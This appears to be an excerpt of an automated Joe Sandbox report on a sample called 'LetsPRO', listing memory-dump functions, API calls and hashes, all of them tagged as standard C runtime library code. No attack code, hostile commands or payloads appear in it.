                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2819658684-0
                                        • Opcode ID: affb6a3a858611cb34f892768287f5c79a2042d106464d425874c50a216bed56
                                        • Instruction ID: 266fbfea99a2c688a45ec97298f4abc7904a2c2ebe0ea263dfea31af7b43c213
                                        • Opcode Fuzzy Hash: affb6a3a858611cb34f892768287f5c79a2042d106464d425874c50a216bed56
                                        • Instruction Fuzzy Hash: 4F213439259382CFD3054E28C4D039D3B6AEF67318F10427ED8D58BA86DB71C586C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94CB0B Relevance: 7.5, APIs: 5, Instructions: 47fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _malloc_crt.MSVCR100(00000354,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB25
                                          • Part of subcall function 6C900B61: malloc.MSVCR100(00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537,00000001,00000001,?,6C901F15,0000000D), ref: 6C900B6D
                                        • FindClose.KERNEL32(?,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB42
                                        • FindFirstFileExW.KERNEL32(-00000002,00000000,00000000,00000000,00000000,?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB5B
                                        • FindNextFileW.KERNEL32(?,?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB82
                                        • FindClose.KERNEL32(?,6C94CC10,?,00000000,-00000002,6C9A5BD0), ref: 6C94CB92
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Find$CloseFile$FirstNext_malloc_crtmalloc
                                        • String ID:
                                        • API String ID: 1203757345-0
                                        • Opcode ID: e7bac50eb213da9e43c85b847377d669cbae3b6d1051a5dbf27b1578b25a2068
                                        • Instruction ID: 830b61f0d3e84cedaa3690f72b6ff5f6fcdeee0397d16e50ff93ab5525b94a9f
                                        • Opcode Fuzzy Hash: e7bac50eb213da9e43c85b847377d669cbae3b6d1051a5dbf27b1578b25a2068
                                        • Instruction Fuzzy Hash: 2301ED7070A1A0AFCF156BA5EC4C94A7EB9EB067A93348527F414C1964DB32C445DB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C8FF4A2 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1663dcd53dc4231eaa9530a72ffec478fe792084ef3fb11132548a3a66088e98
                                        • Instruction ID: caadd4b129e89309c843803f0516c8ea5b6a93a753896543615ec94beb0d7c5b
                                        • Opcode Fuzzy Hash: 1663dcd53dc4231eaa9530a72ffec478fe792084ef3fb11132548a3a66088e98
                                        • Instruction Fuzzy Hash: 37F0B421C5621985C733952483613AB55E04BB63D5F302D5188B8A3F61BB164547CC8C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93BD1E Relevance: 61.6, APIs: 31, Strings: 4, Instructions: 339libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 652 6c93bd1e-6c93bd84 GetSystemInfo call 6c8f2680 GetVersionExW 655 6c93bd86-6c93bd9a call 6c938140 652->655 656 6c93bda4-6c93bdad 652->656 665 6c93bd9e-6c93bd9f call 6c918728 655->665 658 6c93bdb3-6c93bdb4 656->658 659 6c93be90-6c93be96 656->659 661 6c93be46-6c93be4a 658->661 662 6c93bdba-6c93bdbf 658->662 663 6c93c1c7-6c93c1db call 6c938140 659->663 664 6c93be9c-6c93be9d 659->664 666 6c93be81-6c93be8b 661->666 667 6c93be4c-6c93be53 661->667 668 6c93bdc1-6c93bdd2 662->668 669 6c93be29-6c93be41 call 6c938140 662->669 670 6c93beea-6c93bef2 664->670 671 6c93be9f-6c93bea0 664->671 665->656 678 6c93bf14-6c93bf2f GetModuleHandleW GetProcAddress 666->678 675 6c93be72-6c93be7c 667->675 676 6c93be55-6c93be6d 667->676 679 6c93bdd4 668->679 680 6c93bdda-6c93bdf7 GetModuleHandleW GetProcAddress 668->680 669->665 677 6c93bef9-6c93befc 670->677 681 6c93bea2 671->681 682 6c93bef4 671->682 675->680 676->680 685 6c93befe-6c93bf01 677->685 686 6c93beac-6c93bebd 677->686 689 6c93bf31-6c93bf39 GetLastError 678->689 690 6c93bf5d-6c93bf71 GetLastError 678->690 679->680 687 6c93c080-6c93c09a GetLastError 680->687 688 6c93bdfd-6c93be05 GetLastError 680->688 681->686 682->677 685->686 691 6c93bf03-6c93bf06 685->691 694 6c93bec2-6c93bece call 6c93bc2d 686->694 706 6c93c0c1-6c93c0d4 call 6c900263 687->706 707 6c93c09c-6c93c0a0 GetLastError 687->707 692 6c93be11-6c93be24 call 6c9380f2 688->692 693 6c93be07-6c93be0c 688->693 695 6c93bf45-6c93bf58 call 6c9380f2 689->695 696 6c93bf3b-6c93bf40 689->696 704 6c93bf73-6c93bf77 GetLastError 690->704 705 6c93bf9b-6c93bfae call 6c900263 690->705 691->680 699 6c93bf0c-6c93bf0e 691->699 692->665 693->692 710 6c93bed0 call 6c94a2e7 694->710 711 6c93bed5-6c93bee9 call 6c900837 694->711 695->665 696->695 699->678 699->680 712 6c93bf83-6c93bf96 call 6c9380f2 704->712 713 6c93bf79-6c93bf7e 704->713 727 6c93bfb0-6c93bfd9 call 6c90b71d 705->727 728 6c93bfde-6c93bfe4 705->728 729 6c93c0d6-6c93c0fb call 6c90b71d 706->729 730 6c93c104-6c93c10d 706->730 714 6c93c0a2-6c93c0a4 707->714 715 6c93c0a9-6c93c0b8 call 6c9380f2 707->715 710->711 712->665 713->712 714->715 715->706 727->665 737 6c93bfe6-6c93bfea GetLastError 728->737 738 6c93c00e-6c93c032 728->738 729->730 739 6c93c134-6c93c15c 730->739 740 6c93c10f-6c93c113 GetLastError 730->740 741 6c93bff6-6c93c009 call 6c9380f2 737->741 742 6c93bfec-6c93bff1 737->742 745 6c93c034-6c93c03f 738->745 746 6c93c05e-6c93c062 738->746 747 6c93c1a5-6c93c1a9 739->747 748 6c93c15e-6c93c163 739->748 743 6c93c115-6c93c117 740->743 744 6c93c11c-6c93c12b call 6c9380f2 740->744 741->665 742->741 743->744 744->739 752 6c93c040-6c93c045 745->752 746->694 755 6c93c068-6c93c07b call 6c90017e 746->755 747->694 750 6c93c1af-6c93c1c2 call 6c90017e 747->750 753 6c93c165 748->753 754 6c93c16b-6c93c16e 748->754 750->694 760 6c93c047 752->760 761 6c93c04d-6c93c050 752->761 753->754 762 6c93c170 754->762 763 6c93c176-6c93c178 754->763 755->694 760->761 768 6c93c052 761->768 769 6c93c058-6c93c05c 761->769 762->763 765 6c93c196-6c93c1a3 763->765 766 6c93c17a-6c93c181 763->766 765->747 765->748 770 6c93c183-6c93c189 766->770 771 6c93c18d-6c93c190 766->771 768->769 769->746 769->752 770->770 772 6c93c18b 770->772 771->765 772->771
                                        APIs
                                        • GetSystemInfo.KERNEL32(?,00000000,00000000,00000000), ref: 6C93BD42
                                        • _memset.LIBCMT(?,00000000,00000114), ref: 6C93BD6B
                                        • GetVersionExW.KERNEL32(?), ref: 6C93BD7C
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C93BD90
                                          • Part of subcall function 6C938140: std::exception::exception.LIBCMT(6C93C1D6,00000114,?), ref: 6C938154
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93BD9F
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformationEx), ref: 6C93BDE4
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BDEB
                                        • GetLastError.KERNEL32 ref: 6C93BDFD
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BE16
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6C93BE33
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation,?,6C9A0D48,00000000), ref: 6C93BF1E
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C93BF25
                                        • GetLastError.KERNEL32 ref: 6C93BF31
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BF4A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency::unsupported_os::unsupported_osErrorHandleLastModuleProc$ExceptionInfoSystemThrowVersion_memsetstd::exception::exception
                                        • String ID: GetLogicalProcessorInformation$GetLogicalProcessorInformationEx$bad allocation$kernel32.dll
                                        • API String ID: 2475737160-1310109495
                                        • Opcode ID: 832c6828f3ca8d298cd1b57a5e27dbffcc92d2a933d2cf38085655dd169574b5
                                        • Instruction ID: 4c5b76a6811d12b49c0a391ca8d7259ae8671045d0c865d5d44866d42bf6d90a
                                        • Opcode Fuzzy Hash: 832c6828f3ca8d298cd1b57a5e27dbffcc92d2a933d2cf38085655dd169574b5
                                        • Instruction Fuzzy Hash: 55C1C5716096A19FC714DFA5D848A5E77F8BFC6308F209A2EE05CD2A40D734D509CB5B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90DB8B Relevance: 47.5, APIs: 9, Strings: 18, Instructions: 281COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::Name::operator+operator+
                                        • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$const$double$long $signed $unsigned $void$volatile$wchar_t
                                        • API String ID: 2937105810-1531502760
                                        • Opcode ID: a33fd763dadcff665a81455ac638cfd3bccb5ae673bb4a511b4b36e4bc2784c5
                                        • Instruction ID: bec6b65cdbca62f12dbeac9f611bde037f13c63437eb7561b7924fe07222d886
                                        • Opcode Fuzzy Hash: a33fd763dadcff665a81455ac638cfd3bccb5ae673bb4a511b4b36e4bc2784c5
                                        • Instruction Fuzzy Hash: F7A1E6B2B0D109EACF14CEA8D880AEC7778AF66314F10859EE460E7F91D731DA45CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90EB48 Relevance: 47.0, APIs: 31, Instructions: 498fileCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _isatty.MSVCR100(?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C90EBD7
                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E), ref: 6C90EC08
                                        • GetLastError.KERNEL32 ref: 6C90F0E5
                                        • __doserrno.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FDFC
                                        • _errno.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FE03
                                        • _invalid_parameter_noinfo.MSVCR100(00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?), ref: 6C92FE0E
                                        • __doserrno.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE29
                                        • _errno.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE31
                                        • _invalid_parameter_noinfo.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE3C
                                        • __lseeki64_nolock.LIBCMT ref: 6C92FE4D
                                        • _getptd.MSVCR100(?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0), ref: 6C92FE67
                                        • GetConsoleMode.KERNEL32(?,?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C92FE85
                                        • GetConsoleCP.KERNEL32(?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C92FEA5
                                        • isleadbyte.MSVCR100(00000000), ref: 6C92FF15
                                        • __fassign.LIBCMT(?,?,00000002), ref: 6C92FF3F
                                        • __fassign.LIBCMT(?,?,00000001), ref: 6C92FF63
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6C92FF95
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C92FFBE
                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C930017
                                        • _putwch_nolock.MSVCR100(?), ref: 6C93007A
                                        • _putwch_nolock.MSVCR100(0000000D), ref: 6C9300A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: FileWrite$Console__doserrno__fassign_errno_invalid_parameter_noinfo_putwch_nolock$ByteCharErrorLastModeMultiWide__lseeki64_nolock_getptd_isattyisleadbyte
                                        • String ID:
                                        • API String ID: 1737003884-0
                                        • Opcode ID: 57d6d8f93b867ecec42be67612613c8405bcec01682efae99b4f7a8b6830dace
                                        • Instruction ID: 129f239db7019bda92899d1b96c17f711fb3bf1b3d1177409601912dd0c8125f
                                        • Opcode Fuzzy Hash: 57d6d8f93b867ecec42be67612613c8405bcec01682efae99b4f7a8b6830dace
                                        • Instruction Fuzzy Hash: 69127D75B06268CFDB218F69CC80BE977B8BB06318F1415D9E45AD6E85D730DA80CF92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9134BF Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C9134F7
                                        • _errno.MSVCR100 ref: 6C913501
                                        • _wspawnve.MSVCR100(?,?,?,?), ref: 6C913512
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(?,0000005C), ref: 6C913445
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6C91344F
                                          • Part of subcall function 6C913408: wcsrchr.MSVCR100(00000000,0000002E), ref: 6C91346E
                                          • Part of subcall function 6C913408: _waccess_s.MSVCR100(?,00000000), ref: 6C913482
                                        • _errno.MSVCR100 ref: 6C913526
                                        • _errno.MSVCR100 ref: 6C91352F
                                        • _errno.MSVCR100 ref: 6C913552
                                        • _errno.MSVCR100 ref: 6C9284E9
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9284F4
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C928507
                                        • _errno.MSVCR100 ref: 6C928514
                                        • wcschr.MSVCR100(?,0000002F), ref: 6C928527
                                        • _wdupenv_s.MSVCR100(?,00000000,PATH), ref: 6C928540
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C92855A
                                        • _calloc_crt.MSVCR100(00000104,00000002), ref: 6C928570
                                        • _wcslen.LIBCMT(00000000), ref: 6C928599
                                        • wcscat_s.MSVCR100(00000000,00000104,6C9330B8), ref: 6C9285B7
                                        • _wcslen.LIBCMT(00000000), ref: 6C9285C4
                                        • _wcslen.LIBCMT(?,00000000), ref: 6C9285CF
                                        • wcscat_s.MSVCR100(00000000,00000104,?), ref: 6C9285ED
                                        • _errno.MSVCR100 ref: 6C9285FD
                                        • _wspawnve.MSVCR100(?,00000000,?,?), ref: 6C92860E
                                        • _errno.MSVCR100 ref: 6C928622
                                        • __doserrno.MSVCR100 ref: 6C92862C
                                        • free.MSVCR100(00000000), ref: 6C92867B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_wcslenwcsrchr$_invalid_parameter_noinfo_wspawnvewcscat_s$__doserrno__invoke_watson_calloc_crt_waccess_s_wdupenv_sfreewcschr
                                        • String ID: PATH
                                        • API String ID: 3726462291-1036084923
                                        • Opcode ID: 13e0fe1a4ea00db28825c231d71db9e39c80baa0638b4ef473c3cf0923987226
                                        • Instruction ID: b82aa6210612920570e7d49d76d1ac7ff564745fe252c5d65019683d933000c5
                                        • Opcode Fuzzy Hash: 13e0fe1a4ea00db28825c231d71db9e39c80baa0638b4ef473c3cf0923987226
                                        • Instruction Fuzzy Hash: E8516771A08508EFCF255F79CC419EE3778FF2572CB20065AE82897E90EB35CA448662
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910E49 Relevance: 42.3, APIs: 28, Instructions: 254COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C910EAE
                                        • _waccess_s.MSVCR100(?,00000000), ref: 6C910EB8
                                          • Part of subcall function 6C90240B: GetFileAttributesW.KERNEL32(?), ref: 6C90242C
                                        • _errno.MSVCR100 ref: 6C910EC5
                                        • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6C910EE8
                                          • Part of subcall function 6C910CB7: _lock.MSVCR100(00000007,6C910D28,0000000C), ref: 6C910CC5
                                        • _wcslen.LIBCMT(?), ref: 6C910F0D
                                        • _errno.MSVCR100(00000000,00000000,00000000), ref: 6C910F30
                                        • _wcslen.LIBCMT(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C910F8A
                                        • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C910FD3
                                        • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C910FEA
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C91100D
                                        • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C911027
                                        • free.MSVCR100(?), ref: 6C911063
                                        • _errno.MSVCR100 ref: 6C93112C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C931136
                                        • _wfullpath.MSVCR100(?,?,?), ref: 6C93114F
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000), ref: 6C931175
                                        • _wcslen.LIBCMT(?,00000000,00000000,00000000,00000000,00000000), ref: 6C931180
                                        • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6C93118C
                                        • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C9311A7
                                        • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6C9311C2
                                        • _wcslen.LIBCMT(?,?,?,?,00000000,00000000,00000000), ref: 6C9311D2
                                        • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6C9311DE
                                        • _errno.MSVCR100 ref: 6C931217
                                        • _errno.MSVCR100 ref: 6C931222
                                        • free.MSVCR100(?), ref: 6C931234
                                        • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C931258
                                        • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C93125E
                                        • free.MSVCR100(?), ref: 6C931271
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_wcslenfree$_calloc_crt_waccess_swcscpy_s$AttributesFile__invoke_watson_invalid_parameter_noinfo_lock_wdupenv_s_wfullpath
                                        • String ID:
                                        • API String ID: 1320518012-0
                                        • Opcode ID: a61ebba961889ae9fb6feea2326fbd3f36b675912022fe59a55431f9645e4f77
                                        • Instruction ID: f6579992c89e42eb6c4523a81dad0fbd16ee123c5972b9b2cb6b80299a95d65b
                                        • Opcode Fuzzy Hash: a61ebba961889ae9fb6feea2326fbd3f36b675912022fe59a55431f9645e4f77
                                        • Instruction Fuzzy Hash: 2F91A070E442689BCF659F649C897DD77B8AF2A308F1011E9D408E7A60EB31CE848F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C916380 Relevance: 40.8, APIs: 27, Instructions: 271stringtimeCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _lock.MSVCR100(00000007,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163A2
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • __tzname.MSVCR100(6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163AB
                                        • _get_timezone.MSVCR100(?,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163B7
                                        • _get_daylight.MSVCR100(6C9169C5,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163C9
                                        • _get_dstbias.MSVCR100(00000008,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163DB
                                        • ___lc_codepage_func.MSVCR100(6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C9163E9
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D42
                                          • Part of subcall function 6C911D24: _strlen.LIBCMT(00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D51
                                          • Part of subcall function 6C911D24: __fassign.LIBCMT(00000000,00000000,00000000,?,00007FFF,?,6C911CE8,?,6C911D08,00000010), ref: 6C911D6D
                                        • GetTimeZoneInformation.KERNEL32(6C9A5DE8,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C916430
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,6C9A5DEC,00000000,?,0000003F,00000000,?), ref: 6C9164AE
                                        • WideCharToMultiByte.KERNEL32(000000FF,00000000,6C9A5E40,000000FF,?,0000003F,00000000,?), ref: 6C9164E1
                                        • __timezone.MSVCR100 ref: 6C916507
                                        • __daylight.MSVCR100 ref: 6C916511
                                        • __dstbias.MSVCR100 ref: 6C91651B
                                        • strcmp.MSVCR100(00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A19
                                        • free.MSVCR100(00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A32
                                        • _strlen.LIBCMT(00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A39
                                        • _malloc_crt.MSVCR100(00000001,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A40
                                        • _strlen.LIBCMT(00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A56
                                        • strcpy_s.MSVCR100(00000001,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A64
                                        • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A79
                                        • free.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000000,6C916548,0000002C,6C916592,6C9165B0,00000008,6C9169C5), ref: 6C929A7F
                                        • strncpy_s.MSVCR100(?,00000040,00000000,00000003), ref: 6C929A9A
                                        • atol.MSVCR100(-00000003), ref: 6C929AB7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
